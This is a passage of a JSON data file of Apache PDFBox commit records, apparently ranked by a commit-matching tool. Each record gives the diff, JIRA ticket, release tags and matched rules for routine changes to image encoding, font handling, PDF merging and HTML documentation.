b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java", - "@@ -19,4 +19,2 @@ import java.awt.Transparency;", - " import java.awt.image.BufferedImage;", - "-import java.awt.image.DataBuffer;", - "-import java.awt.image.WritableRaster;", - " import java.io.ByteArrayInputStream;", - "@@ -63,3 +61,2 @@ public final class LosslessFactory", - " int[] rgbLineBuffer = new int[width];", - "- byte[] imageData;", - "@@ -70,7 +67,4 @@ public final class LosslessFactory", - " bpc = image.getColorModel().getPixelSize();", - "- deviceColorSpace = PDDeviceGray.INSTANCE;", - "- ", - "- ByteArrayOutputStream bos = new ByteArrayOutputStream((width*bpc/8)+(width*bpc%8 != 0 ? 1:0)*height);", - "- MemoryCacheImageOutputStream mcios = new MemoryCacheImageOutputStream(bos);", - "- ", - "+ ByteArrayOutputStream baos = new ByteArrayOutputStream(((width*bpc/8)+(width*bpc%8 != 0 ? 1:0))*height);", - "+ MemoryCacheImageOutputStream mcios = new MemoryCacheImageOutputStream(baos);", - " for (int y = 0; y < height; ++y)", - "@@ -81,3 +75,3 @@ public final class LosslessFactory", - " }", - "- ", - "+", - " int bitOffset = mcios.getBitOffset();", - "@@ -85,3 +79,3 @@ public final class LosslessFactory", - " {", - "- mcios.writeBits(0, 8-bitOffset);", - "+ mcios.writeBits(0, 8 - bitOffset);", - " }", - "@@ -90,4 +84,5 @@ public final class LosslessFactory", - " mcios.close();", - "- ", - "- imageData = bos.toByteArray();", - "+", - "+ return prepareImageXObject(document, baos.toByteArray(), ", - "+ image.getWidth(), image.getHeight(), bpc, PDDeviceGray.INSTANCE);", - " }", - "@@ -98,148 +93,69 @@ public final class LosslessFactory", - " deviceColorSpace = PDDeviceRGB.INSTANCE;", - "- imageData = new byte[width*height*3];", - "+ byte[] imageData = new byte[width * height * 3];", - " int byteIdx = 0;", - "- ", - "- for (int y = 0; y < height; ++y)", - "+ int alphaByteIdx = 0;", - "+ int alphaBitPos = 7;", - "+ int transparency = image.getTransparency();", - "+ int apbc = transparency == Transparency.BITMASK ? 1 : 8;", - "+ byte[] alphaImageData;", - "+ if (transparency != Transparency.OPAQUE)", - " {", - "- for (int pixel : image.getRGB(0, y, width, 1, rgbLineBuffer, 0, width))", - "- {", - "- imageData[byteIdx++] = (byte)((pixel >> 16) & 0xFF);", - "- imageData[byteIdx++] = (byte)((pixel >> 8) & 0xFF);", - "- imageData[byteIdx++] = (byte)(pixel & 0xFF);", - "- }", - "- }", - "- }", - "-", - "- PDImageXObject pdImage = prepareImageXObject(document, imageData, ", - "- image.getWidth(), image.getHeight(), bpc, deviceColorSpace);", - "-", - "- // alpha -> soft mask", - "- PDImage xAlpha = createAlphaFromARGBImage(document, image);", - "- if (xAlpha != null)", - "- {", - "- pdImage.getCOSObject().setItem(COSName.SMASK, xAlpha);", - "- }", - "-", - "- return pdImage;", - "- }", - "-", - "- /**", - "- * Creates a grayscale Flate encoded PDImageXObject from the alpha channel", - "- * of an image.", - "- *", - "- * @param document the document where the image will be created.", - "- * @param image an ARGB image.", - "- *", - "- * @return the alpha channel of an image as a grayscale image.", - "- *", - "- * @throws IOException if something goes wrong", - "- */", - "- private static PDImageXObject createAlphaFromARGBImage(PDDocument document, BufferedImage image)", - "- throws IOException", - "- {", - "- // this implementation makes the assumption that the raster values can be used 1:1 for", - "- // the stream. ", - "- // Sadly the type of the databuffer is usually TYPE_INT and not TYPE_BYTE so we can't just", - "- // save it directly", - "- if (!image.getColorModel().hasAlpha())", - "- {", - "- return null;", - "- }", - "-", - "- // extract the alpha information", - "- WritableRaster alphaRaster = image.getAlphaRaster();", - "- if (alphaRaster == null)", - "- {", - "- // happens sometimes (PDFBOX-2654) despite colormodel claiming to have alpha", - "- return createAlphaFromARGBImage2(document, image);", - "- }", - "-", - "- int[] pixels = alphaRaster.getPixels(0, 0,", - "- alphaRaster.getWidth(),", - "- alphaRaster.getHeight(),", - "- (int[]) null);", - "- ByteArrayOutputStream bos = new ByteArrayOutputStream();", - "- int bpc;", - "- if (image.getTransparency() == Transparency.BITMASK)", - "- {", - "- bpc = 1;", - "- MemoryCacheImageOutputStream mcios = new MemoryCacheImageOutputStream(bos);", - "- int width = alphaRaster.getWidth();", - "- int p = 0;", - "- for (int pixel : pixels)", - "- {", - "- mcios.writeBit(pixel);", - "- ++p;", - "- if (p % width == 0)", - "- {", - "- while (mcios.getBitOffset() != 0)", - "- {", - "- mcios.writeBit(0);", - "- }", - "- }", - "+ alphaImageData = new byte[((width * apbc / 8) + (width * apbc % 8 != 0 ? 1 : 0)) * height];", - " }", - "- mcios.flush();", - "- mcios.close();", - "- }", - "- else", - "- {", - "- bpc = 8;", - "- int dataType = alphaRaster.getDataBuffer().getDataType();", - "- // for 16 bit images divide by 256 ", - "- int shift = dataType == DataBuffer.TYPE_USHORT ? 8 : 0;", - "- for (int pixel : pixels)", - "+ else", - " {", - "- bos.write(pixel >>> shift);", - "+ alphaImageData = new byte[0];", - " }", - "- }", - "- PDImageXObject pdImage = prepareImageXObject(document, bos.toByteArray(), ", - "- image.getWidth(), image.getHeight(), bpc, PDDeviceGray.INSTANCE);", - "-", - "- return pdImage;", - "- }", - "-", - "- // create alpha image the hard way: get the alpha through getRGB()", - "- private static PDImageXObject createAlphaFromARGBImage2(PDDocument document, BufferedImage bi)", - "- throws IOException", - "- {", - "- ByteArrayOutputStream bos = new ByteArrayOutputStream();", - "- int bpc;", - "- if (bi.getTransparency() == Transparency.BITMASK)", - "- {", - "- bpc = 1;", - "- MemoryCacheImageOutputStream mcios = new MemoryCacheImageOutputStream(bos);", - "- for (int y = 0, h = bi.getHeight(); y < h; ++y)", - "+ for (int y = 0; y < height; ++y)", - " {", - "- for (int x = 0, w = bi.getWidth(); x < w; ++x)", - "+ for (int pixel : image.getRGB(0, y, width, 1, rgbLineBuffer, 0, width))", - " {", - "- int alpha = bi.getRGB(x, y) >>> 24;", - "- mcios.writeBit(alpha);", - "+ imageData[byteIdx++] = (byte) ((pixel >> 16) & 0xFF);", - "+ imageData[byteIdx++] = (byte) ((pixel >> 8) & 0xFF);", - "+ imageData[byteIdx++] = (byte) (pixel & 0xFF);", - "+ if (transparency != Transparency.OPAQUE)", - "+ {", - "+ // we have the alpha right here, so no need to do it separately", - "+ // as done prior April 2018", - "+ if (transparency == Transparency.BITMASK)", - "+ {", - "+ // write a bit", - "+ alphaImageData[alphaByteIdx] |= ((pixel >> 24) & 1) << alphaBitPos;", - "+ if (--alphaBitPos < 0)", - "+ {", - "+ alphaBitPos = 7;", - "+ ++alphaByteIdx;", - "+ }", - "+ }", - "+ else", - "+ {", - "+ // write a byte", - "+ alphaImageData[alphaByteIdx++] = (byte) ((pixel >> 24) & 0xFF);", - "+ }", - "+ }", - " }", - "- while (mcios.getBitOffset() != 0)", - "+ if (transparency == Transparency.BITMASK)", - " {", - "- mcios.writeBit(0);", - "+ // skip boundary if needed", - "+ if (alphaBitPos != 7)", - "+ {", - "+ alphaBitPos = 7;", - "+ ++alphaByteIdx;", - "+ }", - " }", - " }", - "- mcios.flush();", - "- mcios.close();", - "- }", - "- else", - "- {", - "- bpc = 8;", - "- for (int y = 0, h = bi.getHeight(); y < h; ++y)", - "+ PDImageXObject pdImage = prepareImageXObject(document, imageData,", - "+ image.getWidth(), image.getHeight(), bpc, deviceColorSpace);", - "+", - "+ if (transparency != Transparency.OPAQUE)", - " {", - "- for (int x = 0, w = bi.getWidth(); x < w; ++x)", - "- {", - "- int alpha = bi.getRGB(x, y) >>> 24;", - "- bos.write(alpha);", - "- }", - "+ PDImageXObject pdMask = prepareImageXObject(document, alphaImageData,", - "+ image.getWidth(), image.getHeight(), apbc, PDDeviceGray.INSTANCE);", - "+ pdImage.getCOSObject().setItem(COSName.SMASK, pdMask);", - " }", - "- }", - "- PDImageXObject pdImage = prepareImageXObject(document, bos.toByteArray(), ", - "- bi.getWidth(), bi.getHeight(), bpc, PDDeviceGray.INSTANCE);", - "-", - "- return pdImage;", - "- } ", - "+ return pdImage;", - "+ } ", - "+ }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/graphics/image/LosslessFactory.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4187": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "0d5139b5efa8fb5d9b857fd6f96866b416f63ce0" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4187", - "relevance": 2 - } - ] - }, - { - "commit_id": "f7e4dd4de6d78a7a1f57b6df94dff0eba49fd0d3", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532535643, - "hunks": 2, - "message": "PDFBOX-4278: .notdef may have a stream git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836645 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", - "index 66a2fbe6d..26d64fe61 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java", - "@@ -352,11 +352,6 @@ public class PDType3Font extends PDSimpleFont", - " String name = getEncoding().getName(code);", - "- if (!\".notdef\".equals(name))", - "+ COSBase base = getCharProcs().getDictionaryObject(COSName.getPDFName(name));", - "+ if (base instanceof COSStream)", - " {", - "- COSStream stream;", - "- stream = (COSStream)getCharProcs().getDictionaryObject(COSName.getPDFName(name));", - "- if (stream == null)", - "- {", - "- return null;", - "- }", - "- return new PDType3CharProc(this, stream);", - "+ return new PDType3CharProc(this, (COSStream) base);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType3Font.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4278": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "7bbbe04f3f964a7dd85aa7159ba552633a65d011" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4278", - "relevance": 2 - } - ] - }, - { - "commit_id": "d7b0cadb912398b60e78290197c11bf5ee4a882f", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530041874, - "hunks": 1, - "message": "PDFBOX-4071: added comment on interface segregation principle violation git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1834456 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionTypeIdentity.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionTypeIdentity.java", - "index 51e104192..4e8774220 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionTypeIdentity.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionTypeIdentity.java", - "@@ -38,2 +38,3 @@ public class PDFunctionTypeIdentity extends PDFunction", - " throw new UnsupportedOperationException();", - "+ //TODO this is a violation of the interface segregation principle", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/common/function/PDFunctionTypeIdentity.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "f489b3a33c482e56b33c5eeaeafba54c30bd1400" - ] - ], - "tags": [ - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "c0a5d3263f4edb4a7cb18e8a6b771cd52b145b91", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528821629, - "hunks": 2, - "message": "PDFBOX-4071: fix typo git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833412 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", - "index d106951b9..fa0eb98c4 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", - "@@ -153,3 +153,3 @@ public class PDTrueTypeFont extends PDSimpleFont implements PDVectorFont", - " {", - "- // the TTF is fully loaded and it is save to close the underlying data source", - "+ // the TTF is fully loaded and it is safe to close the underlying data source", - " ttf.close();", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "index f0e623931..f21d27aef 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "@@ -119,3 +119,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", - " {", - "- // the TTF is fully loaded and it is save to close the underlying data source", - "+ // the TTF is fully loaded and it is safe to close the underlying data source", - " ttf.close();" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDTrueTypeFont.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "5bfb4bebbb307fa3f7e53bbd26979f9ef8eff072" - ], - [ - "no-tag", - "10eeea43a009f84f25ae2e42273c82f674f1ed8f" - ], - [ - "no-tag", - "1361b17b5b6558d023c466621eb0467856cb4cc4" - ], - [ - "no-tag", - "51ea7f5696688e4230f6cd527f2305fee743bf31" - ], - [ - "no-tag", - "bcb1e5b8e811e0cf2b16b5cf317aec9d979507ca" - ], - [ - "no-tag", - "678c2bba31751533b9ab3a224f8948679832d6fd" - ], - [ - "no-tag", - "8e61ca064c84348847bef6a2dc725a2621e9f332" - ], - [ - "no-tag", - "a189b83b2e50ce2f05b3f0074e8ce9fa89c05ac7" - ], - [ - "no-tag", - "21f2388f3f840cc8b142d994825d962d9a6f86b1" - ], - [ - "no-tag", - "d39a774a7bec85230fdbbf589ee9cf2719dfc0b6" - ], - [ - "no-tag", - "ef4d02fbac17344619e8ed6f6b6edebf48b474f8" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "caa033a27a338d7575fe0d85bf42a8aafbdbbabe", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524155251, - "hunks": 10, - "message": "PDFBOX-3999: clone objects not in mapping to prevent them from remaining attached to the source document git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829574 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "index 61bd18924..90c656425 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "@@ -42,2 +42,3 @@ import org.apache.pdfbox.cos.COSName;", - " import org.apache.pdfbox.cos.COSNumber;", - "+import org.apache.pdfbox.cos.COSObject;", - " import org.apache.pdfbox.cos.COSStream;", - "@@ -740,3 +741,3 @@ public class PDFMergerUtility", - " {", - "- updatePageReferences(srcNumbersArray, objMapping);", - "+ updatePageReferences(cloner, srcNumbersArray, objMapping);", - " for (int i = 0; i < srcNumbersArray.size() / 2; i++)", - "@@ -966,3 +967,5 @@ public class PDFMergerUtility", - " */", - "- private void updatePageReferences(COSDictionary parentTreeEntry, Map objMapping)", - "+ private void updatePageReferences(PDFCloneUtility cloner,", - "+ COSDictionary parentTreeEntry, Map objMapping)", - "+ throws IOException", - " {", - "@@ -974,5 +977,26 @@ public class PDFMergerUtility", - " COSBase obj = parentTreeEntry.getDictionaryObject(COSName.OBJ);", - "- if (obj instanceof COSDictionary && objMapping.containsKey(obj))", - "+ if (obj instanceof COSDictionary)", - " {", - "- parentTreeEntry.setItem(COSName.OBJ, objMapping.get(obj));", - "+ if (objMapping.containsKey(obj))", - "+ {", - "+ parentTreeEntry.setItem(COSName.OBJ, objMapping.get(obj));", - "+ }", - "+ else", - "+ {", - "+ // PDFBOX-3999: clone objects that are not in mapping to make sure that", - "+ // these don't remain attached to the source document", - "+ COSBase item = parentTreeEntry.getItem(COSName.OBJ);", - "+ if (item instanceof COSObject)", - "+ {", - "+ LOG.debug(\"clone potential orphan object in structure tree: \" + item +", - "+ \", type: \" + ((COSDictionary) obj).getNameAsString(COSName.TYPE));", - "+ }", - "+ else", - "+ {", - "+ // don't display because of stack overflow", - "+ LOG.debug(\"clone potential orphan object in structure tree, type: \" +", - "+ ((COSDictionary) obj).getNameAsString(COSName.TYPE));", - "+ }", - "+ parentTreeEntry.setItem(COSName.OBJ, cloner.cloneForNewDocument(obj));", - "+ }", - " }", - "@@ -981,3 +1005,3 @@ public class PDFMergerUtility", - " {", - "- updatePageReferences((COSArray) kSubEntry, objMapping);", - "+ updatePageReferences(cloner, (COSArray) kSubEntry, objMapping);", - " }", - "@@ -985,3 +1009,3 @@ public class PDFMergerUtility", - " {", - "- updatePageReferences((COSDictionary) kSubEntry, objMapping);", - "+ updatePageReferences(cloner, (COSDictionary) kSubEntry, objMapping);", - " }", - "@@ -989,3 +1013,5 @@ public class PDFMergerUtility", - "- private void updatePageReferences(COSArray parentTreeEntry, Map objMapping)", - "+ private void updatePageReferences(PDFCloneUtility cloner,", - "+ COSArray parentTreeEntry, Map objMapping)", - "+ throws IOException", - " {", - "@@ -996,3 +1022,3 @@ public class PDFMergerUtility", - " {", - "- updatePageReferences((COSArray) subEntry, objMapping);", - "+ updatePageReferences(cloner, (COSArray) subEntry, objMapping);", - " }", - "@@ -1000,3 +1026,3 @@ public class PDFMergerUtility", - " {", - "- updatePageReferences((COSDictionary) subEntry, objMapping);", - "+ updatePageReferences(cloner, (COSDictionary) subEntry, objMapping);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3999": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "39c6d3cb118df719e05d7bbfe9b8dff4fd5c54f1" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3999", - "relevance": 2 - } - ] - }, - { - "commit_id": "bb2eb267a1c07112b65d09782503be01efa23fb0", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528999765, - "hunks": 1, - "message": "PDFBOX-4071: clarify toString() output git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1833538 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "index 666da8dcf..472396a4c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java", - "@@ -552,3 +552,3 @@ public class PDType0Font extends PDFont implements PDVectorFont", - " }", - "- return getClass().getSimpleName() + \"/\" + descendant + \" \" + getBaseFont();", - "+ return getClass().getSimpleName() + \"/\" + descendant + \", PostScript name: \" + getBaseFont();", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/font/PDType0Font.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "0edd54a6b3d98d89b329e86d45a60505a64305e5" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "36903a94c92b0cae06e0778d32a545afa4fe4f28", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527057676, - "hunks": 4, - "message": "PDFBOX-2941: remove unneeded field in new method from previous commit git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832076 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "index 44d1b49b3..a9017b4c8 100644", - "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "@@ -1401,3 +1401,2 @@ public class PDFDebugger extends JFrame", - " {", - "- PDDocument document;", - " while (true)", - "@@ -1406,3 +1405,3 @@ public class PDFDebugger extends JFrame", - " {", - "- document = open();", - "+ return open();", - " }", - "@@ -1430,5 +1429,3 @@ public class PDFDebugger extends JFrame", - " }", - "- break;", - " }", - "- return document;", - " }" - ], - "changed_files": [ - "debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-2941": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "1aa2a219a44154b954607c50f4163615f71365bf" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-2941", - "relevance": 2 - } - ] - }, - { - "commit_id": "f6cd739c536e46b354c3b2607425038798725408", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526593643, - "hunks": 1, - "message": "PDFBOX-4223: be lenient when encountering invalid /OpenAction git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831816 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "index 329e6fbe2..7f14ebb8e 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", - "@@ -511,3 +511,3 @@ public class PDFMergerUtility", - "- destCatalog.setOpenAction(srcCatalog.getOpenAction());", - "+ destCatalog.setOpenAction(openAction);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4223": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "a7e92f4381120dafe1174be59f2b1838cbf98c83" - ], - [ - "no-tag", - "c3e216b49aedc67af52c32438dde96397cd21625" - ], - [ - "no-tag", - "67493d08260328826f0acbb58394395461bb9c9f" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4223", - "relevance": 2 - } - ] - }, - { - "commit_id": "8916f4dd35b3a0abbe76ba42e3f9a5f4da41249f", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1529080933, - "hunks": 3, - "message": "PDFBOX-4112: avoid self-closing elements for jdk10 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833610 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/ant/package.html b/examples/src/main/java/org/apache/pdfbox/examples/ant/package.html", - "index 1d70ed480..f5b00c0a1 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/ant/package.html", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/ant/package.html", - "@@ -23,11 +23,11 @@", - " ANT tasks that utilize PDFBox features can be found in this package.", - "-This is an example of using the PDF2Text task:

    ", - "+This is an example of using the PDF2Text task:

    ", - "-<taskdef name=\"pdf2text\" classname=\"org.apache.pdfbox.ant.PDFToTextTask\" classpathref=\"build.classpath\" />
    ", - "+<taskdef name=\"pdf2text\" classname=\"org.apache.pdfbox.ant.PDFToTextTask\" classpathref=\"build.classpath\" />
    ", - "-<pdf2text>
    ", - "-   <fileset dir=\"test\">
    ", - "-     <include name=\"**/*.pdf\" />
    ", - "-   </fileset>
    ", - "-</pdf2text>
    ", - "+<pdf2text>
    ", - "+   <fileset dir=\"test\">
    ", - "+     <include name=\"**/*.pdf\" />
    ", - "+   </fileset>
    ", - "+</pdf2text>
    ", - " ", - "diff --git a/fontbox/src/main/java/org/apache/fontbox/afm/package.html b/fontbox/src/main/java/org/apache/fontbox/afm/package.html", - "index 4a97e56ca..d8ae7bd94 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/afm/package.html", - "+++ b/fontbox/src/main/java/org/apache/fontbox/afm/package.html", - "@@ -23,3 +23,3 @@", - " This package holds classes used to parse AFM(Adobe Font Metrics) files.", - "-
    ", - "+
